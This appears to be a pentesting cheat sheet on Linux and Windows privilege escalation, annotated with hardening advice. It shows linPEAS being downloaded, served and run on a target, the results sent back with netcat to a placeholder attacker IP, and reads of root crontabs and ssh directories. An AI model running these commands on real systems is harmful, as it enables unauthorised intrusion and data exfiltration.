Privilege Escalation (PrivEsc)

NOTE: automated enumeration scripts are noisy and easily flagged by monitoring software, so manual checks may be preferred

🐧 Linux

🔍 linPEAS

# === ATTACKER ===
# Stage linpeas.sh on the tester's machine and serve it to the target over HTTP.
cd /tmp
# Pulls whatever the "latest" release is at download time; nothing here pins a
# version or checks a hash.
# NOTE(review): review or verify the downloaded file before it is executed anywhere.
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
# `ip a` prints the local interface addresses (the value used for <IP_ADDR> below).
# `http.server` serves the current directory (/tmp here), unauthenticated and on all
# interfaces by default, so every file in it is readable by anyone who can reach
# port 8000. Serve from a dedicated directory (--directory), restrict the listener
# (--bind), and stop the server once the transfer is done.
ip a ; python3 -m http.server 8000

# === TARGET ===
cd /tmp
# Plain HTTP: the script crosses the network with no transport or integrity protection.
wget http://<IP_ADDR>:8000/linpeas.sh
chmod +x linpeas.sh
# REGEXES="0" is passed to linpeas.sh as an environment variable for this run only
# (presumably turns off its regex-based searches; confirm against the linpeas docs).
# `2>&1 | tee` prints the output to the terminal and saves stdout+stderr to the file.
# The saved report can contain sensitive findings; both linpeas.sh and
# linpeas_output.txt remain in /tmp afterwards, so record them as engagement
# artefacts and remove them when finished.
REGEXES="0" ./linpeas.sh 2>&1 | tee linpeas_output.txt

# === KALI ===
# Option 1: copy the report back over SSH (encrypted in transit, authenticated).
scp <USER>@<TARGET>:/tmp/linpeas_output.txt ~/
# NC
# Option 2: raw TCP with netcat. The first command is the listener on the Kali side,
# the second is run on the target and sends the file to it.
# This channel is cleartext and unauthenticated: the report is readable on the wire
# and anything that connects to <PORT> first is written to the output file.
# Prefer the scp option when SSH is available.
nc -l -p <PORT> > ~/linpeas_output.txt
cat /tmp/linpeas_output.txt | nc <ATTACKER_IP> <PORT>
# wait a moment, then CTRL+C
# (this nc invocation does not exit on its own once the file has been sent)

Manual Method

# Installed packages and their versions (Debian-family systems); used to compare
# installed versions against published advisories.
dpkg -l

# Lists the sudo rules that apply to the current user; may prompt for that user's password.
# Hardening check: rules should be narrow, with no unnecessary NOPASSWD entries.
sudo -l

# System-wide crontab plus root's per-user crontab (the latter is normally only
# readable by root, so a permission error is expected for unprivileged users).
# Hardening check: every script or binary a root job runs should be writable by root only.
cat /etc/crontab /var/spool/cron/crontabs/root
# Drop-in cron job files, with owner and mode shown.
ls -la /etc/cron.d/

# Ownership and permissions of each user's ~/.ssh directory (and root's).
# Hardening check: directories should be 0700 and private keys 0600, owned by the account.
ls -la /home/*/.ssh/
ls -la /root/.ssh/

🪟 Windows

REM Lists the names of the entries directly under both Program Files directories
REM (installed-software inventory). `%~f` expands the loop variable without its
REM surrounding quotes; `dir /b` prints bare names only.
REM `%f` is the interactive-prompt form; inside a .bat/.cmd file it must be `%%f`.
for %f in ("C:\Program Files", "C:\Program Files (x86)") do @(echo. && echo --- Listing: %~f --- && dir "%~f" /b)

Priv Esc Exploits